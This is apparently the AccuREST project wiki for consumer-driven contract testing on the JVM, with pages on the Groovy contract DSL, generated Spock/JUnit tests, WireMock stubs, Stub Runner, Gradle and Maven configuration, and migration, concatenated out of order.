Spec\n\n[source,groovy,indent=0]\n----\nabstract class BaseMockMvcSpec extends Specification {\n\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new PairIdController())\n }\n\n void isProperCorrelationId(Integer correlationId) {\n assert correlationId == 123456\n }\n}\n----\n\n## JAX-RS support\nStarting with release 0.8.0 we support JAX-RS 2 Client API. Base class needs to define `protected WebTarget webTarget` and server initialization, right now the only option how to test JAX-RS API is to start a web server.\n\nRequest with a body needs to have a content type set otherwise `application\/octet-stream` is going to be used.\n\nIn order to use JAX-RS mode, use the following settings:\n\n[source,groovy,indent=0]\n----\ntestMode = 'JAXRSCLIENT'\n----\n\nExample of a test API generated:\n\n[source,groovy,indent=0]\n----\nclass FraudDetectionServiceSpec extends MvcSpec {\n\n\tdef shouldMarkClientAsNotFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":123.123}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus == \"OK\"\n\t\t\tassertThatRejectionReasonIsNull(responseBody.rejectionReason)\n\t}\n\n\tdef shouldMarkClientAsFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":99999}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus ==~ java.util.regex.Pattern.compile('[A-Z]{5}')\n\t\t\tresponseBody.rejectionReason == \"Amount too high\"\n\t}\n\n}\n----\n\n# 4. Client Side\n\nDuring the tests you want to have a Wiremock instance up and running that simulates the service Y.\nYou would like to feed that instance with a proper stub definition. That stub definition would need\nto be valid from the Wiremock's perspective but should also be reusable on the server side.\n\n__Summing it up:__ On this side, in the stub definition, you can use patterns for request stubbing and you need exact\nvalues for responses.\n\n# 5. Server Side\n\nBeing a service Y since you are developing your stub, you need to be sure that it's actually resembling your\nconcrete implementation. You can't have a situation where your stub acts in one way and your application on\nproduction behaves in a different way.\n\nThat's why from the provided stub acceptance tests will be generated that will ensure\nthat your application behaves in the same way as you define in your stub.\n\n__Summing it up:__ On this side, in the stub definition, you need exact values as request and can use patterns\/methods\nfor response verification.\n\n# 6. Examples\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url '\/api\/12'\n headers {\n header 'Content-Type': 'application\/vnd.com.ofg.twitter-places-analyzer.v1+json'\n }\n body '''\\\n [{\n \"created_at\": \"Sat Jul 26 09:38:57 +0000 2014\",\n \"id\": 492967299297845248,\n \"id_str\": \"492967299297845248\",\n \"text\": \"Gonna see you at Warsaw\",\n \"place\":\n {\n \"attributes\":{},\n \"bounding_box\":\n {\n \"coordinates\":\n [[\n [-77.119759,38.791645],\n [-76.909393,38.791645],\n [-76.909393,38.995548],\n [-77.119759,38.995548]\n ]],\n \"type\":\"Polygon\"\n },\n \"country\":\"United States\",\n \"country_code\":\"US\",\n \"full_name\":\"Washington, DC\",\n \"id\":\"01fbe706f872cb32\",\n \"name\":\"Washington\",\n \"place_type\":\"city\",\n \"url\": \"http:\/\/api.twitter.com\/1\/geo\/id\/01fbe706f872cb32.json\"\n }\n }]\n'''\n }\n response {\n status 200\n }\n}\n----\n\n# 7. Scenarios\n\nIt's possible to handle scenarios with Accurest. All you need to do is to stick to proper naming convention while creating your contracts. The convention requires to include order number followed by the underscore.\n\n[source,indent=0]\n----\nmy_contracts_dir\\\n scenario1\\\n 1_login.groovy\n 2_showCart.groovy\n 3_logout.groovy\n----\n\nSuch tree will cause Accurest generating Wiremock's scenario with name `scenario1` and three steps:\n - login marked as `Started` pointing to:\n - showCart marked as `Step1` pointing to:\n - logout marked as `Step2` which will close the scenario.\nMore details about Wiremock scenarios can be found under [http:\/\/wiremock.org\/stateful-behaviour.html](http:\/\/wiremock.org\/stateful-behaviour.html)\n\nAccurest will also generate tests with guaranteed order of execution.\n\n# 8. Stub Runner\n\nOne of the issues that you could have encountered while using AccuREST was to pass the generated WireMock JSON stubs from the server side to the client side (or various clients). Copying the JSON files manually is out of the question.\n\nIn this article you'll see how to prepare your project to start publishing stubs as JARs and how to use Stub Runner in your tests to run WireMock servers and feed them with stub definitions.\n\n## Publishing stubs as JARs\n\nThe easiest approach would be to centralize the way stubs are kept. For example you can keep them as JARs in a Maven repository.\n\n### Gradle\n\nExample of AccuREST Gradle setup:\n\n[source,groovy,indent=0]\n----\n\tapply plugin: 'maven-publish'\n\n\text {\n\t\twiremockStubsOutputDirRoot = file(\"${project.buildDir}\/production\/${project.name}-stubs\/\")\n\t\twiremockStubsOutputDir = new File(wiremockStubsOutputDirRoot)\n\t}\n\n\taccurest {\n\t\ttargetFramework = 'Spock'\n\t\ttestMode = 'MockMvc'\n\t\tbaseClassForTests = 'com.toomuchcoding.MvcSpec'\n\t\tcontractsDslDir = file(\"${project.projectDir.absolutePath}\/mappings\/\")\n\t\tgeneratedTestSourcesDir = file(\"${project.buildDir}\/generated-sources\/\")\n\t\tstubsOutputDir = wiremockStubsOutputDir\n\t}\n\n\ttask stubsJar(type: Jar, dependsOn: [\"generateWireMockClientStubs\"]) {\n\t baseName = \"${project.name}-stubs\"\n\t from wiremockStubsOutputDirRoot\n\t}\n\n\tartifacts {\n\t archives stubsJar\n\t}\n\n\tpublishing {\n\t publications {\n\t stubs(MavenPublication) {\n\t artifactId \"${project.name}-stubs\"\n\t artifact stubsJar\n\t }\n\t }\n\t}\n----\n\n### Maven\n\nExample of Maven can be found in the [AccuREST Maven Plugin README](https:\/\/github.com\/Codearte\/accurest-maven-plugin\/#publishing-wiremock-stubs-projectf-stubsjar)\n\n## Using Stub Runner to automate running stubs\n\nStub Runner automates downloading stubs from a Maven repository (that includes also the local Maven repository) and starting the WireMock server for each of those stubs.\n\n### Modules\n\nAccuREST comes with a new structure of modules\n\n[source,indent=0]\n----\n\u2514\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner-junit\n \u251c\u2500\u2500 stub-runner-spring\n \u2514\u2500\u2500 stub-runner-spring-cloud\n----\n\n#### Stub Runner\n\nContains core logic of Stub Runner. Gives you a main class to run Stub Runner from the command line or from Gradle.\n\nHere you can see a list of options with which you can run Stub Runner:\n\n[source,indent=0]\n----\njava -jar stub-runner.jar [options...]\n -maxp (--maxPort) N : Maximum port value to be assigned to the\n Wiremock instance. Defaults to 15000\n (default: 15000)\n -minp (--minPort) N : Minimal port value to be assigned to the\n Wiremock instance. Defaults to 10000\n (default: 10000)\n -s (--stubs) VAL : Comma separated list of Ivy representation of\n jars with stubs. Eg. groupid:artifactid1,group\n id2:artifactid2:classifier\n -sr (--stubRepositoryRoot) VAL : Location of a Jar containing server where you\n keep your stubs (e.g. http:\/\/nexus.net\/content\n \/repositories\/repository)\n -ss (--stubsSuffix) VAL : Suffix for the jar containing stubs (e.g.\n 'stubs' if the stub jar would have a 'stubs'\n classifier for stubs: foobar-stubs ).\n Defaults to 'stubs' (default: stubs)\n -wo (--workOffline) : Switch to work offline. Defaults to 'false'\n (default: false)\n----\n\nYou can either produce a fat-jar and run the app like presented above.\n\nYou can also configure the stub runner by either passing the full arguments list with the `-Pargs` like this:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pargs=\"-c pl -minp 10000 -maxp 10005 -s a:b:c,d:e,f:g:h\"`\n\nor each parameter separately with a `-P` prefix and without the hyphen (-) in the name of the param\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pc=pl -Pminp=10000 -Pmaxp=10005 -Ps=a:b:c,d:e,f:g:h`\n\n#### Stub Runner JUnit Rule\n\nStub Runner comes with a JUnit rule thanks to which you can very easily download and run stubs for given group and artifact id:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n .downloadStub(\"io.codearte:stub1\", \"io.codearte:stub2:classifier\", \"io.codearte:stub3\");\n----\n\nAfter that rule gets executed Stub Runner connects to your Maven repository and for the given list of dependencies tries to:\n* download them\n* cache them locally\n* unzip them to a temporary folder\n* start a WireMock server for each Maven dependency on a random port from the provided range of ports\n* feed the WireMock server with all JSON files that are valid WireMock definitions\n\nStub Runner uses [Groovy's Grape](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) mechanism to download the Maven dependencies. Check their [docs](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) for more information.\n\nSince the `AccurestRule` implements the `StubFinder` it allows you to find the started stubs:\n\n[source,groovy,indent=0]\n----\ninterface StubFinder {\n\t\/**\n\t * For the given groupId and artifactId tries to find the matching\n\t * URL of the running stub.\n\t *\n\t * @param groupId - might be null. In that case a search only via artifactId takes place\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String groupId, String artifactId)\n\n\t\/**\n\t * For the given Ivy notation {@code groupId:artifactId} tries to find the matching\n\t * URL of the running stub. You can also pass only {@code artifactId}.\n\t *\n\t * @param ivyNotation - Ivy representation of the Maven artifact\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String ivyNotation)\n\n\t\/**\n\t * Returns all running stubs\n\t *\/\n\tRunningStubs findAllRunningStubs()\n}\n----\n\nExample of usage in Spock tests:\n\n[source,groovy,indent=0]\n----\n@ClassRule @Shared AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot('http:\/\/your.repo.com')\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') == rule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\trule.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${rule.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${rule.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n----\n\nExample of usage in JUnit tests:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\");\n\n\t@Test\n\tpublic void should_start_wiremock_servers() throws Exception {\n\t\t\/\/ expect: 'WireMocks are running'\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isEqualTo(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\"));\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isNotNull();\n\t\t\/\/ and:\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"loanIssuance\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs\", \"fraudDetectionServer\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isTrue();\n\t\t\/\/ and: 'Stubs were registered'\n\t\t\tthen(httpGet(rule.findStubUrl(\"loanIssuance\").toString() + \"\/name\")).isEqualTo(\"loanIssuance\");\n\t\t\tthen(httpGet(rule.findStubUrl(\"fraudDetectionServer\").toString() + \"\/name\")).isEqualTo(\"fraudDetectionServer\");\n\t}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring\n\nIf you're using Spring then you can just import the `io.codearte.accurest.stubrunner.spring.StubRunnerConfiguration` and a bean of type `StubFinder` will get registered.\n\nIn order to find a URL and port of a given dependency you can autowire the bean in your test and call its methods:\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(classes = Config, loader = SpringApplicationContextLoader)\nclass StubRunnerConfigurationSpec extends Specification {\n\n\t@Autowired StubFinder stubFinder\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') == stubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\tstubFinder.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${stubFinder.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${stubFinder.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n\n\t@Configuration\n\t@Import(StubRunnerConfiguration)\n\t@EnableAutoConfiguration\n\tstatic class Config {}\n}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring Cloud\n\nIf you're using Spring Cloud then it's enough to add `stub-runner-spring-cloud` on classpath and automatically a bean of type `StubFinder` will get registered.\n\n#### Common properties for JUnit and Spring\n\nSome of the properties that are repetitive can be set using system properties or property sources (for Spring). Here are their names with their default values:\n\n[width=\"60%\",frame=\"topbot\",options=\"header\"]\n|======================\n| Property name | Default value | Description |\n|stubrunner.port.range.min|10000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.port.range.max|15000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.stubs.repository.root|| Maven repo url. If blank then will call the local maven repo|\n|stubrunner.stubs.classifier|stubs| Default classifier for the stub artifacts|\n|stubrunner.work-offline|false| If true then will not contact any remote repositories to download stubs|\n|stubrunner.stubs|| Comma separated list of Ivy notation of stubs to download|\n|======================\n\n# 9. Migration Guide\n\n# Migration to 0.4.7\n- in 0.4.7 we've fixed package name (coderate to codearte) so you've to do the same in your projects. This means replacing ```io.coderate.accurest.dsl.GroovyDsl``` with ```io.codearte.accurest.dsl.GroovyDsl```\n\n# Migration to 1.0.0-RC1\n- from 1.0.0 we're distinguish ignored contracts from excluded contracts:\n - `excludedFiles` pattern tells Accurest to skip processing those files at all\n - `ignoredFiles` pattern tells Accurest to generate contracts and tests, but tests will be marked as `@Ignore`\n\n- from 1.0.0 the `basePackageForTests` behaviour has changed\n - prior to the change all DSL files had to be under `contractsDslDir`\/`basePackageForTests`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - now all DSL files have to be under `contractsDslDir`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - If you don't migrate to the new approach you will have your tests under `contractsDslDir`.`contractsDslDir`.*subpackage*[:github-tag: master\n:github-repo: Codearte\/accurest\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n\nWelcome to the AccuREST Wiki!\n\nPlease follow to the Introduction page to start your journey with Consumer Driven Contracts in JVM\n\n# 1. Introduction\n\nJust to make long story short - AccuREST is a tool that enables Consumer Driven Contract (CDC) development of JVM-based applications. It is shipped with __REST Contract Definition Language__ (DSL). Contract definitions are used by AccuREST to produce following resources:\n* JSON stub definitions to be used by Wiremock when doing integration testing on the client code (__client tests__). Test code must still be written by hand, test data is produced by AccuREST.\n* Acceptance tests (in Spock) used to verify if server-side implementation of the API is compliant with the contract (__server tests__). Full test is generated by AccuREST.\n\nAccuREST moves TDD to the level of software architecture.\n\n# Why?\n\nThe main purposes of AccuREST are:\n\n - to ensure that WireMock stubs (used when developing the client) are doing exactly what actual server-side implementation will do,\n - to promote ATDD method and Microservices architectural style,\n - to provide a way to publish changes in contracts that are immediately visible on both sides,\n - to generate boilerplate test code used on the server side.\n\n# 2. Using in your project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta** . Of course the higher the better :)\n\n# 2.1. Gradle Project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta** . Of course the higher the better :)\n\n## Add gradle plugin\n\n[source,groovy,indent=0]\n----\nbuildscript {\n\trepositories {\n\t\tmavenCentral()\n\t}\n\tdependencies {\n\t\tclasspath 'io.codearte.accurest:accurest-gradle-plugin:0.9.9'\n\t}\n}\n\napply plugin: 'accurest'\n\ndependencies {\n\ttestCompile 'org.spockframework:spock-core:1.0-groovy-2.4'\n testCompile 'com.github.tomakehurst:wiremock:2.0.4-beta' \/\/ you have to use WireMock with 2.0 versions of JsonPath\n\ttestCompile 'com.jayway.restassured:rest-assured:2.4.1'\n\ttestCompile 'com.jayway.restassured:spring-mock-mvc:2.4.1' \/\/ needed if you're going to use Spring MockMvc\n}\n----\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal> \/\/ for JUnit tests, use generateSpecs for Spock Specification\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in src\/test\/resources\/stubs directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\nsrc\/test\/resources\/stubs\/myservice\/shouldCreateUser.groovy\nsrc\/test\/resources\/stubs\/myservice\/shouldReturnUser.groovy\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - shouldCreateUser()\n - shouldReturnUser()\n\n## Run plugin\n\nPlugin registers itself to be invoked before `compileTestGroovy` task. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateAccurest` task.\n\n## Configure plugin\n\nTo change default configuration just add `accurest` snippet to your Gradle config\n\n[source,groovy,indent=0]\n----\naccurest {\n\ttestMode = 'MockMvc'\n\tbaseClassForTests = 'org.mycompany.tests'\n\tgeneratedTestSourcesDir = project.file('src\/accurest')\n}\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default MockMvc which is based on Spring's MockMvc. It can also be changed to **JaxRsClient** or to **Explicit** for real HTTP calls.\n - **imports** - array with imports that should be included in generated tests (for example ['org.myorg.Matchers']). By default empty array []\n - **staticImports** - array with static imports that should be included in generated tests(for example ['org.myorg.Matchers.*']). By default empty array []\n - **basePackageForTests** - specifies base package for all generated tests. By default set to io.codearte.accurest.tests\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **ignoredFiles** - Ant matcher allowing defining stub files for which processing should be skipped. By default empty array []\n - **contractsDslDir** - directory containing contracts written using the GroovyDSL. By default `$rootDir\/src\/test\/accurest`\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `$buildDir\/generated-test-sources\/accurest`\n - **stubsOutputDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed\n - **targetFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke:\n`.\/gradlew generateAccurest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in src\/test\/resources\/stubs and generate Wiremock json stubs using: `.\/gradlew generateWireMockClientStubs` command. Note that `stubsOutputDir` option has to be set for stub generation to work.\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 2.2. Using in your Maven project\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in `src\/test\/accurest` directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\n[source,groovy,indent=0]\n----\nsrc\/test\/accurest\/myservice\/shouldCreateUser.groovy\nsrc\/test\/accurest\/myservice\/shouldReturnUser.groovy\n----\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - `shouldCreateUser()`\n - `shouldReturnUser()`\n\n## Run plugin\n\nPlugin goal `generateTests` is assigned to be invoked in phase `generate-test-sources`. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateTests` goal.\n\n## Configure plugin\n\nTo change default configuration just add `configuration` section to plugin definition or `execution` definition.\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <configuration>\n <basePackageForTests>com.ofg.twitter.place<\/basePackageForTests>\n <baseClassForTests>com.ofg.twitter.place.BaseMockMvcSpec<\/baseClassForTests>\n <\/configuration>\n<\/plugin>\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default `MockMvc` which is based on Spring's MockMvc. It can also be changed to `JaxRsClient` or to `Explicit` for real HTTP calls.\n - **basePackageForTests** - specifies base package for all generated tests. By default set to `io.codearte.accurest.tests`.\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`.\n - **contractsDir** - directory containing contracts written using the GroovyDSL. By default `\/src\/test\/accurest`.\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `target\/generated-test-sources\/accurest`.\n - **mappingsDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed.\n - **testFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nAccurest Maven Plugins generates verification code into directory `\/generated-test-sources\/accurest` and attach this directory to `testCompile` goal.\n\nFor Groovy Spock code use:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.codehaus.gmavenplus<\/groupId>\n\t<artifactId>gmavenplus-plugin<\/artifactId>\n\t<version>1.5<\/version>\n\t<executions>\n\t\t<execution>\n\t\t\t<goals>\n\t\t\t\t<goal>testCompile<\/goal>\n\t\t\t<\/goals>\n\t\t<\/execution>\n\t<\/executions>\n\t<configuration>\n\t\t<testSources>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.basedir}\/src\/test\/groovy<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.build.directory}\/generated-test-sources\/accurest<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t<\/testSources>\n\t<\/configuration>\n<\/plugin>\n----\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke `mvn generateTest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in `src\/test\/accurest` and generate Wiremock json stubs using: `mvn generateStubs` command. By default generated WireMock mapping is stored in directory `target\/mappings`. Your project should create from this generated mappings additional artifact with classifier `stubs` for easy deploy to maven repository.\n\nSample configuration:\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <version>${accurest.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 3. Contract DSL\n\nContract DSL in AccuREST is written in Groovy, but don't be alarmed if you didn't use Groovy before. Knowledge of the language is not really needed as our DSL uses only a tiny subset of it (namely literals, method calls and closures). What's more, AccuREST's DSL is designed to be programmer-readable without any knowledge of the DSL itself.\n\nLet's look at full example of a contract definition.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'POST'\n urlPath('\/users') {\n queryParameters {\n parameter 'limit': 100\n parameter 'offset': containing(\"1\")\n parameter 'filter': \"email\"\n }\n }\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n response {\n status 200\n headers {\n header 'Location': '\/users\/john'\n 